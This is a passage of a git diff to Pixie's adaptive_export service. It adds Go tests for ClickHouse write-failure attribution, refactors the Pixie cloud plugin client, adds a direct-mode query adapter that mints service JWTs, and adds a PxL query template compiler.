+ w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"0"}`) + w.WriteHeader(http.StatusOK) + })) + defer ch.Close() + + s, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + rec := &capRec{} + loop := New( + tableQuerier{n: map[string]int{table: nRows}}, + s, + Config{ + Window: 60 * time.Second, + Tables: []string{table}, + Rec: rec, + Hostname: "node-test", + }, + ) + loop.tick(context.Background()) + + if posts.Load() != 1 { + t.Fatalf("CH endpoint hit %d times, want 1", posts.Load()) + } + if len(rec.rows) != 1 { + t.Fatalf("recorded %d reconcile rows, want 1", len(rec.rows)) + } + row := rec.rows[0] + if row.Table != table { + t.Fatalf("Table=%q want %q", row.Table, table) + } + if row.ReadCount != int64(nRows) { + t.Fatalf("ReadCount=%d, want %d (read from querier)", row.ReadCount, nRows) + } + if row.WroteCount != 0 { + t.Fatalf("WroteCount=%d, want 0 (CH silent-drop must land here, not at %d)", row.WroteCount, nRows) + } + if !strings.Contains(row.WriteErr, "silent drop") && !strings.Contains(row.WriteErr, "written_rows") { + t.Fatalf("WriteErr=%q, want CH silent-drop attribution", row.WriteErr) + } +} + +// TestTick_ReconcileAttributesCHFailureCorrectly — the dual to +// CHSilentDrop: when CH returns an actual 5xx, the loop must record +// the same (read=N, wrote=0) shape with a different WriteErr. Proves +// the loop's read-count vs wrote-count split is sink-error-agnostic +// (it's the COUNT that matters for R6 attribution, not the specific +// failure mode). 
+func TestTick_ReconcileAttributesCHFailureCorrectly(t *testing.T) { + const ( + table = "dns_events" + nRows = 7 + ) + ch := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { + w.WriteHeader(http.StatusInternalServerError) + _, _ = w.Write([]byte("Memory limit exceeded")) + })) + defer ch.Close() + + s, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + rec := &capRec{} + loop := New( + tableQuerier{n: map[string]int{table: nRows}}, + s, + Config{ + Window: 60 * time.Second, + Tables: []string{table}, + Rec: rec, + Hostname: "node-test", + }, + ) + loop.tick(context.Background()) + + if len(rec.rows) != 1 { + t.Fatalf("recorded %d reconcile rows, want 1", len(rec.rows)) + } + row := rec.rows[0] + if row.ReadCount != int64(nRows) || row.WroteCount != 0 { + t.Fatalf("got (read,wrote)=(%d,%d) want (%d,0)", row.ReadCount, row.WroteCount, nRows) + } + if !strings.Contains(row.WriteErr, "500") && !strings.Contains(row.WriteErr, "Memory") { + t.Fatalf("WriteErr=%q, want 500/Memory attribution", row.WriteErr) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pixie/pixie.go b/src/vizier/services/adaptive_export/internal/pixie/pixie.go index feb8cadd698..e62c2a323d1 100644 --- a/src/vizier/services/adaptive_export/internal/pixie/pixie.go +++ b/src/vizier/services/adaptive_export/internal/pixie/pixie.go @@ -14,12 +14,18 @@ // // SPDX-License-Identifier: Apache-2.0 +// Package pixie is a thin gRPC wrapper around Pixie cloud's +// PluginService — used by adaptive_export at boot only, to ensure the +// ClickHouse retention plugin is enabled. Retention scripts themselves +// (the PxL that Pixie runs to populate forensic_db.) are +// user-defined via the Pixie UI; this package does NOT manage them. 
package pixie import ( "context" "crypto/tls" "fmt" + "net" "strings" "github.com/gogo/protobuf/types" @@ -38,6 +44,7 @@ const ( exportURLConfig = "exportURL" ) +// Client wraps a gRPC connection to Pixie cloud's PluginService. type Client struct { cloudAddr string ctx context.Context @@ -46,43 +53,72 @@ type Client struct { pluginClient cloudpb.PluginServiceClient } +// NewClient dials the Pixie cloud and authenticates with apiKey via +// the per-call metadata header. +// +// Auth choice — why API key here, not a service JWT. +// Two different gRPC perimeters are talked to from AE: +// 1. This package (pixie.Client) targets the Pixie CLOUD (cloudpb's +// PluginService): enabling the ClickHouse retention plugin, syncing +// preset retention scripts. The cloud's auth interceptor accepts the +// `pixie-api-key` header for external clients and resolves it to an +// org. JWT service tokens minted with PL_JWT_SIGNING_KEY are only +// trusted by INSIDE-cluster vizier services (kelvin, metadata, +// query_broker); cloud rejects them. See +// src/cloud/api/controllers/auth_grpc.go:62 for the cloud-side +// "pixie-api-key" handler and src/api/go/pxapi/client.go:117 for +// pixie's own SDK using the same header. +// 2. pixieapi.Adapter (internal/pixieapi) targets vizier DIRECTLY +// (vizierpb.VizierService at query-broker / PEM direct-query) and +// correctly uses JWT via jwtutils.GenerateJWTForService — the same +// pattern as cloud_connector/vizhealth/checker.go:111 and +// query_broker/script_runner/script_runner.go:248. +// +// So: this NewClient must take an API key; flipping it to JWT would +// break cloud auth, not improve it. 
func NewClient(ctx context.Context, apiKey string, cloudAddr string) (*Client, error) { if apiKey == "" { - fmt.Println("WARNING: API key is empty!") + return nil, fmt.Errorf("pixie: empty API key") } - c := &Client{ cloudAddr: cloudAddr, ctx: metadata.AppendToOutgoingContext(ctx, "pixie-api-key", apiKey), } - if err := c.init(); err != nil { return nil, err } - return c, nil } func (c *Client) init() error { - isInternal := strings.ContainsAny(c.cloudAddr, "cluster.local") - - tlsConfig := &tls.Config{InsecureSkipVerify: isInternal} + host := c.cloudAddr + if h, _, err := net.SplitHostPort(c.cloudAddr); err == nil { + host = h + } + isInternal := host == "cluster.local" || strings.HasSuffix(host, ".cluster.local") + tlsConfig := &tls.Config{ + InsecureSkipVerify: isInternal, //nolint:gosec // in-cluster vizier traffic only + MinVersion: tls.VersionTLS12, + } creds := credentials.NewTLS(tlsConfig) - conn, err := grpc.Dial(c.cloudAddr, grpc.WithTransportCredentials(creds)) if err != nil { return err } - c.grpcConn = conn c.pluginClient = cloudpb.NewPluginServiceClient(conn) return nil } +// ClickHousePluginConfig is the minimal config the ensure-on path needs. +type ClickHousePluginConfig struct { + ExportURL string +} + +// GetClickHousePlugin returns the ClickHouse retention plugin descriptor, +// or an error if it is not registered with the cloud. 
func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) { - req := &cloudpb.GetPluginsRequest{ - Kind: cloudpb.PK_RETENTION, - } + req := &cloudpb.GetPluginsRequest{Kind: cloudpb.PK_RETENTION} resp, err := c.pluginClient.GetPlugins(c.ctx, req) if err != nil { return nil, err @@ -92,44 +128,35 @@ func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) { return plugin, nil } } - return nil, fmt.Errorf("the %s plugin could not be found", clickhousePluginID) -} - -type ClickHousePluginConfig struct { - ExportURL string + return nil, fmt.Errorf("pixie: %s plugin not found", clickhousePluginID) } +// GetClickHousePluginConfig returns the current org-level config (the +// ExportURL the retention plugin is currently writing to), falling back +// to the plugin's default if no custom URL is set. func (c *Client) GetClickHousePluginConfig() (*ClickHousePluginConfig, error) { - req := &cloudpb.GetOrgRetentionPluginConfigRequest{ - PluginId: clickhousePluginID, - } + req := &cloudpb.GetOrgRetentionPluginConfigRequest{PluginId: clickhousePluginID} resp, err := c.pluginClient.GetOrgRetentionPluginConfig(c.ctx, req) if err != nil { return nil, err } exportURL := resp.CustomExportUrl if exportURL == "" { - exportURL, err = c.getDefaultClickHouseExportURL() + info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, + &cloudpb.GetRetentionPluginInfoRequest{PluginId: clickhousePluginID}) if err != nil { return nil, err } + exportURL = info.DefaultExportURL } - return &ClickHousePluginConfig{ - ExportURL: exportURL, - }, nil -} - -func (c *Client) getDefaultClickHouseExportURL() (string, error) { - req := &cloudpb.GetRetentionPluginInfoRequest{ - PluginId: clickhousePluginID, - } - info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, req) - if err != nil { - return "", err - } - return info.DefaultExportURL, nil + return &ClickHousePluginConfig{ExportURL: exportURL}, nil } +// EnableClickHousePlugin turns the plugin on with the supplied +// ExportURL. 
Idempotent on the cloud side: calling Enable when already +// enabled re-applies the same config without effect. DisablePresets is +// true so existing user-defined retention scripts (the source of truth +// for what gets written) are not overwritten by Pixie's preset set. func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version string) error { req := &cloudpb.UpdateRetentionPluginConfigRequest{ PluginId: clickhousePluginID, @@ -146,36 +173,12 @@ func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version return err } -// DisableClickHousePlugin flips the retention plugin off without touching scripts. -// Scripts are expected to be removed separately via DeleteDataRetentionScript. -func (c *Client) DisableClickHousePlugin(version string) error { - req := &cloudpb.UpdateRetentionPluginConfigRequest{ - PluginId: clickhousePluginID, - Enabled: &types.BoolValue{Value: false}, - Version: &types.StringValue{Value: version}, - } - _, err := c.pluginClient.UpdateRetentionPluginConfig(c.ctx, req) - return err -} - -func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { - resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) - if err != nil { - return nil, err - } - var l []*script.ScriptDefinition - for _, s := range resp.Scripts { - if s.PluginId == clickhousePluginID && s.IsPreset { - sd, err := c.getScriptDefinition(s) - if err != nil { - return nil, err - } - l = append(l, sd) - } - } - return l, nil -} - +// GetClusterScripts returns the retention scripts CURRENTLY installed on +// clusterID. Caller diffs against GetPresetScripts to figure out what +// to add / update / delete. Filters the cloud-returned ALL-clusters +// script list to those that actually target the caller's clusterID — +// without that filter, the diff later treats other clusters' scripts +// as "stale on this cluster" and tries to delete them. 
func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Script, error) { resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) if err != nil { @@ -184,31 +187,33 @@ func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Scr var l []*script.Script for _, s := range resp.Scripts { if s.PluginId == clickhousePluginID { + clusterIDs := make([]string, 0, len(s.ClusterIDs)) + // Empty clusterID = no filter (legacy callers; rare). + match := clusterID == "" + for _, id := range s.ClusterIDs { + idStr := utils.ProtoToUUIDStr(id) + clusterIDs = append(clusterIDs, idStr) + if idStr == clusterID { + match = true + } + } + if !match { + continue + } sd, err := c.getScriptDefinition(s) if err != nil { return nil, err } l = append(l, &script.Script{ ScriptDefinition: *sd, - ScriptId: utils.ProtoToUUIDStr(s.ScriptID), - ClusterIds: getClusterIDsAsString(s.ClusterIDs), + ScriptID: utils.ProtoToUUIDStr(s.ScriptID), + ClusterIds: strings.Join(clusterIDs, ","), }) } } return l, nil } -func getClusterIDsAsString(clusterIDs []*uuidpb.UUID) string { - scriptClusterID := "" - for i, id := range clusterIDs { - if i > 0 { - scriptClusterID = scriptClusterID + "," - } - scriptClusterID = scriptClusterID + utils.ProtoToUUIDStr(id) - } - return scriptClusterID -} - func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.ScriptDefinition, error) { resp, err := c.pluginClient.GetRetentionScript(c.ctx, &cloudpb.GetRetentionScriptRequest{ID: s.ScriptID}) if err != nil { @@ -223,6 +228,19 @@ func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.Script }, nil } +// DeleteDataRetentionScript removes the script with the given UUID. +// Used by INSTALL_PRESET_SCRIPTS to purge stale scripts that target +// tables no longer in the schema. 
+func (c *Client) DeleteDataRetentionScript(scriptID string) error { + req := &cloudpb.DeleteRetentionScriptRequest{ + ID: utils.ProtoFromUUIDStrOrNil(scriptID), + } + _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) + return err +} + +// AddDataRetentionScript creates a new retention script on clusterID, +// running every frequencyS seconds with the given PxL contents. func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, description string, frequencyS int64, contents string) error { req := &cloudpb.CreateRetentionScriptRequest{ ScriptName: scriptName, @@ -236,24 +254,32 @@ func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, des return err } -func (c *Client) UpdateDataRetentionScript(clusterID string, scriptID string, scriptName string, description string, frequencyS int64, contents string) error { - req := &cloudpb.UpdateRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptID), - ScriptName: &types.StringValue{Value: scriptName}, - Description: &types.StringValue{Value: description}, - Enabled: &types.BoolValue{Value: true}, - FrequencyS: &types.Int64Value{Value: frequencyS}, - Contents: &types.StringValue{Value: contents}, - ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterID)}, +// EnsureClickHousePluginEnabled is the boot-time idempotent op the +// operator calls in main.go. If the plugin is already enabled with a +// non-empty ExportURL, no-op. Otherwise, enable it with the supplied +// fallback URL. Returns the resolved ExportURL for diagnostics. 
+func (c *Client) EnsureClickHousePluginEnabled(fallbackExportURL string) (string, error) { + plugin, err := c.GetClickHousePlugin() + if err != nil { + return "", err } - _, err := c.pluginClient.UpdateRetentionScript(c.ctx, req) - return err -} - -func (c *Client) DeleteDataRetentionScript(scriptID string) error { - req := &cloudpb.DeleteRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptID), + if plugin.RetentionEnabled { + cfg, err := c.GetClickHousePluginConfig() + if err != nil { + return "", err + } + if cfg.ExportURL != "" { + return cfg.ExportURL, nil + } } - _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) - return err + if fallbackExportURL == "" { + return "", fmt.Errorf("pixie: plugin not enabled and no fallback ExportURL provided") + } + if err := c.EnableClickHousePlugin( + &ClickHousePluginConfig{ExportURL: fallbackExportURL}, + plugin.LatestVersion, + ); err != nil { + return "", err + } + return fallbackExportURL, nil } diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel new file mode 100644 index 00000000000..3cf661a2c79 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel @@ -0,0 +1,38 @@ +load("@px//bazel:pl_build_system.bzl", "pl_go_test") + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") + +go_library( + name = "pixieapi", + srcs = ["pixieapi.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/api/go/pxapi", + "//src/api/go/pxapi/errdefs", + "//src/api/go/pxapi/types", + "//src/shared/services/utils", + ], +) + +pl_go_test( + name = "pixieapi_test", + srcs = ["pixieapi_test.go"], + embed = [":pixieapi"], +) diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go new file mode 100644 index 00000000000..61c8bef283f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go @@ -0,0 +1,223 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pixieapi adapts pxapi to a flat-row Pixie interface for the +// controller. Use when the operator (not the cloud's retention plugin) +// is the writer of pixie observation rows — necessary on deployments +// where the cloud can't reach an internal ClickHouse endpoint. 
+package pixieapi + +import ( + "context" + "errors" + "fmt" + "os" + "sync" + + "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/api/go/pxapi/errdefs" + "px.dev/pixie/src/api/go/pxapi/types" + jwtutils "px.dev/pixie/src/shared/services/utils" +) + +// Row is a flat per-pixie-row map[col]any. Compatible with sink's +// per-row JSONEachRow encoder. +type Row map[string]any + +// Adapter executes PxL via pxapi and returns flat rows. +type Adapter struct { + client *pxapi.Client + clusterID string + // directOpts, when non-nil, makes Query rebuild a pxapi.Client per + // call with a freshly-minted service JWT in WithBearerAuth. Used + // for direct-mode (in-cluster vizier-query-broker), where the cloud + // passthrough proxy is bypassed entirely. JWTs are minted fresh + // because GenerateJWTForService produces 10-minute claims and we + // want each fan-out window to carry its own valid token. + directOpts *DirectOptions +} + +// DirectOptions configures direct-mode connection to vizier in-cluster. +// Use when the cloud's passthrough proxy can't authorize the operator's +// API key (e.g. self-hosted clouds where API keys are scoped per-cluster +// and a freshly-deployed cluster isn't yet linked to the key's owner). +type DirectOptions struct { + // VizierAddr is the in-cluster gRPC endpoint, typically + // "vizier-query-broker-svc.pl.svc.cluster.local:50300". + VizierAddr string + // SigningKey is the cluster's JWT signing key, mounted from + // pl-cluster-secrets/jwt-signing-key. + SigningKey string + // ServiceID is the issuer-side service identifier (claim "sub"). + // Defaults to "adaptive_export" if empty. + ServiceID string +} + +// New constructs an Adapter wired to the cluster's vizier via cloud passthrough. +func New(client *pxapi.Client, clusterID string) *Adapter { + return &Adapter{client: client, clusterID: clusterID} +} + +// NewDirect constructs an Adapter that bypasses the pixie cloud and +// connects directly to the in-cluster vizier-query-broker. 
Each Query +// call rebuilds the gRPC client with a fresh service JWT. +// +// TLS: direct dial uses pxapi.WithDirectTLSSkipVerify() (added in +// PR #49 b523ce362 for the same node-IP-dial scenario PEM +// direct-query needs). That option skips InsecureSkipVerify gating on +// PX_DISABLE_TLS and on addr containing "cluster.local" — the AE +// operator always targets cluster-internal vizier with a self-signed +// CA we don't have a clean way to mount, so the always-skip semantics +// match the deployment shape and remove the brittle env coupling. +// CodeRabbit r3379377607. +func NewDirect(clusterID string, opts DirectOptions) (*Adapter, error) { + if opts.ServiceID == "" { + opts.ServiceID = "adaptive_export" + } + return &Adapter{clusterID: clusterID, directOpts: &opts}, nil +} + +// NewDirectFromEnv builds a direct-mode Adapter from the runtime env. +// Reads ADAPTIVE_VIZIER_DIRECT_ADDR for the broker addr and +// PL_JWT_SIGNING_KEY for the signing key (matching kelvin/metadata +// pod env conventions). Returns an error if either is missing. +func NewDirectFromEnv(clusterID string) (*Adapter, error) { + addr := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR") + if addr == "" { + return nil, errors.New("pixieapi: ADAPTIVE_VIZIER_DIRECT_ADDR not set") + } + sk := os.Getenv("PL_JWT_SIGNING_KEY") + if sk == "" { + return nil, errors.New("pixieapi: PL_JWT_SIGNING_KEY not set (mount pl-cluster-secrets/jwt-signing-key)") + } + // NewDirect only applies the ServiceID default. No PX_DISABLE_TLS / + // cluster.local precondition is checked here: Query dials with + // pxapi.WithDirectTLSSkipVerify, which does not depend on that env. + return NewDirect(clusterID, DirectOptions{VizierAddr: addr, SigningKey: sk}) +} + +// Query executes pxl on the configured cluster and aggregates every +// emitted record from every table into one []Row. 
+func (a *Adapter) Query(ctx context.Context, pxl string) ([]Row, error) { + client := a.client + if a.directOpts != nil { + // Direct mode: build fresh client + fresh service JWT for each + // query. JWT is 10-min; fan-out is seconds, so this is safe. + jwt, err := jwtutils.SignJWTClaims( + jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"), + a.directOpts.SigningKey, + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: sign JWT: %w", err) + } + // pxapi.Client doesn't expose a Close — its grpc.ClientConn is + // unexported. We accept GC-time reclamation: a Query in direct + // mode runs once per anomaly window per refresh interval (≥30s + // in production), so the per-query connection-leak rate is + // bounded and matched by goroutine + JWT expiry every ~10min. + // If we ever build a high-throughput direct-mode path, swap to + // a long-lived client + JWT-refresh ticker instead. + c, err := pxapi.NewClient(ctx, + pxapi.WithCloudAddr(a.directOpts.VizierAddr), + pxapi.WithDirectTLSSkipVerify(), + pxapi.WithBearerAuth(jwt), + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: direct dial: %w", err) + } + client = c + } + vz, err := client.NewVizierClient(ctx, a.clusterID) + if err != nil { + return nil, fmt.Errorf("pixieapi: vizier dial: %w", err) + } + mux := newCollector() + rs, err := vz.ExecuteScript(ctx, pxl, mux) + if err != nil { + return nil, fmt.Errorf("pixieapi: ExecuteScript: %w", err) + } + defer rs.Close() + if err := rs.Stream(); err != nil { + if errdefs.IsCompilationError(err) { + return nil, fmt.Errorf("pixieapi: PxL compilation: %w", err) + } + return nil, fmt.Errorf("pixieapi: stream: %w", err) + } + return mux.rows(), nil +} + +type collector struct { + mu sync.Mutex + all []Row +} + +func newCollector() *collector { return &collector{} } + +func (c *collector) AcceptTable(_ context.Context, _ types.TableMetadata) (pxapi.TableRecordHandler, error) { + return &tableHandler{out: c}, nil +} + +func (c *collector) rows() 
[]Row { + c.mu.Lock() + defer c.mu.Unlock() + return append([]Row(nil), c.all...) +} + +type tableHandler struct { + out *collector + meta types.TableMetadata +} + +func (h *tableHandler) HandleInit(_ context.Context, md types.TableMetadata) error { + h.meta = md + return nil +} + +func (h *tableHandler) HandleRecord(_ context.Context, rec *types.Record) error { + row := make(Row, len(h.meta.ColInfo)) + for _, col := range h.meta.ColInfo { + datum := rec.GetDatum(col.Name) + if datum == nil { + continue + } + row[col.Name] = datumValue(datum) + } + h.out.mu.Lock() + h.out.all = append(h.out.all, row) + h.out.mu.Unlock() + return nil +} + +func (h *tableHandler) HandleDone(_ context.Context) error { return nil } + +func datumValue(d types.Datum) any { + switch v := d.(type) { + case *types.BooleanValue: + return v.Value() + case *types.Int64Value: + return v.Value() + case *types.Float64Value: + return v.Value() + case *types.StringValue: + return v.Value() + case *types.Time64NSValue: + return v.Value() + case *types.UInt128Value: + return v.Value() + default: + return d.String() + } +} diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go new file mode 100644 index 00000000000..a664f8b245b --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go @@ -0,0 +1,101 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pixieapi + +import ( + "os" + "testing" +) + +// The direct-mode constructors are the #36 broker-direct entry points (AE bypasses +// the cloud passthrough → immune to the "cluster is not in a healthy state" gate). +// These guards are what stop a misconfigured operator from crashing at first Query +// (pxapi log.Fatal's on cluster.local without PX_DISABLE_TLS), so they must hold. + +func clearDirectEnv(t *testing.T) { + t.Helper() + for _, k := range []string{"ADAPTIVE_VIZIER_DIRECT_ADDR", "PL_JWT_SIGNING_KEY", "PX_DISABLE_TLS"} { + t.Setenv(k, "") // t.Setenv records + restores; "" then Unsetenv for a clean slate + os.Unsetenv(k) + } +} + +func TestNewDirectFromEnv_MissingAddr(t *testing.T) { + clearDirectEnv(t) + if _, err := NewDirectFromEnv("cid"); err == nil { + t.Fatal("expected error when ADAPTIVE_VIZIER_DIRECT_ADDR is unset") + } +} + +func TestNewDirectFromEnv_MissingSigningKey(t *testing.T) { + clearDirectEnv(t) + t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300") + if _, err := NewDirectFromEnv("cid"); err == nil { + t.Fatal("expected error when PL_JWT_SIGNING_KEY is unset") + } +} + +// TestNewDirect_NoEnvGate — direct dial now uses pxapi.WithDirectTLSSkipVerify +// (PR #49 b523ce362), which doesn't read PX_DISABLE_TLS at all. NewDirect +// must therefore accept any addr regardless of env. 
+func TestNewDirect_NoEnvGate(t *testing.T) { + clearDirectEnv(t) + for _, addr := range []string{ + "vizier-query-broker-svc.pl.svc.cluster.local:50300", + "vizier.example:50300", + "10.42.0.5:50300", + } { + a, err := NewDirect("cid", DirectOptions{VizierAddr: addr, SigningKey: "k"}) + if err != nil { + t.Fatalf("NewDirect(%q): %v", addr, err) + } + if a.directOpts == nil { + t.Fatalf("direct-mode Adapter must carry directOpts (so Query takes the broker path)") + } + if a.client != nil { + t.Error("direct-mode Adapter must NOT hold a cloud client (it dials per-query)") + } + if a.directOpts.ServiceID != "adaptive_export" { + t.Errorf("ServiceID should default to adaptive_export, got %q", a.directOpts.ServiceID) + } + } +} + +func TestNewDirectFromEnv_Success(t *testing.T) { + clearDirectEnv(t) + t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300") + t.Setenv("PL_JWT_SIGNING_KEY", "signing-key") + t.Setenv("PX_DISABLE_TLS", "1") + a, err := NewDirectFromEnv("cluster-123") + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if a.directOpts == nil || a.clusterID != "cluster-123" { + t.Fatalf("expected direct Adapter for cluster-123, got %+v", a) + } + if a.directOpts.VizierAddr == "" || a.directOpts.SigningKey != "signing-key" { + t.Errorf("directOpts not populated from env: %+v", a.directOpts) + } +} + +// New (cloud) path stays cloud — sanity that the two constructors don't cross-wire. 
+func TestNewCloudHasNoDirectOpts(t *testing.T) { + a := New(nil, "cid") + if a.directOpts != nil { + t.Error("cloud Adapter must not have directOpts") + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel index 80afa3f2875..606898d6eaf 100644 --- a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel @@ -15,16 +15,32 @@ # SPDX-License-Identifier: Apache-2.0 load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") go_library( name = "pxl", - srcs = ["pxl.go"], + srcs = [ + "compile.go", + "queryfor.go", + "tables.go", + ], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ - "//src/api/go/pxapi", - "//src/api/go/pxapi/errdefs", - "//src/api/go/pxapi/types", - "@com_github_sirupsen_logrus//:logrus", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "pxl_test", + srcs = [ + "compile_test.go", + "queryfor_bench_test.go", + "queryfor_test.go", + "tables_test.go", + ], + embed = [":pxl"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", ], ) diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile.go b/src/vizier/services/adaptive_export/internal/pxl/compile.go new file mode 100644 index 00000000000..de3d16d0aad --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/compile.go @@ -0,0 +1,74 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "fmt" + "strconv" + "strings" + "time" +) + +// CompilePassthrough returns a precompiled PxL TEMPLATE for a firehose +// (empty-Target) pull of `table` over a fixed rolling `window`. The result +// is identical to QueryFor with an empty anomaly.Target EXCEPT the two +// precise time_ bounds are left as `%d` verbs (lower, upper — both +// UnixNano), to be rendered per tick with Render / fmt.Sprintf. +// +// Why a template instead of calling QueryFor every tick: +// - QueryFor takes `now` and derives the relative `start_time=` bound from +// `now - sliceStart`. For passthrough that delta is ALWAYS `window`, so +// the relative bound is constant across ticks and can be baked in once. +// - The script body (DataFrame, upid_to_namespace/pod, display) never +// changes, so it is compiled once at loop construction rather than +// re-resolved on every refresh. +// +// Only the two post-filter bounds vary per tick, so the rendered string is +// byte-identical to what QueryFor would have produced for the same window — +// the precompiled path is a pure performance/structure change, not a +// behavioural one. upid→namespace/pod resolution stays in PxL (unchanged). +func CompilePassthrough(table string, window time.Duration) (string, error) { + if !IsBuiltin(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // Mirror QueryFor's pad: covers the full window plus a 30s safety + // margin, clamped to a 30s floor. 
+ pad := window + 30*time.Second + if pad < 30*time.Second { + pad = 30 * time.Second + } + relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s" + + // Builtin table names never contain '%', so embedding them around the + // two `%d` verbs is Sprintf-safe. + var b strings.Builder + b.WriteString(pxSetMaxRows) + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n") + b.WriteString("df = df[df.time_ >= px.int64_to_time(%d)]\n") + b.WriteString("df = df[df.time_ < px.int64_to_time(%d)]\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + b.WriteString("px.display(df, '" + table + "')\n") + return b.String(), nil +} + +// Render fills a CompilePassthrough template with the precise [sliceStart, +// sliceEnd) bounds for one tick. +func Render(tmpl string, sliceStart, sliceEnd time.Time) string { + return fmt.Sprintf(tmpl, sliceStart.UnixNano(), sliceEnd.UnixNano()) +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile_test.go 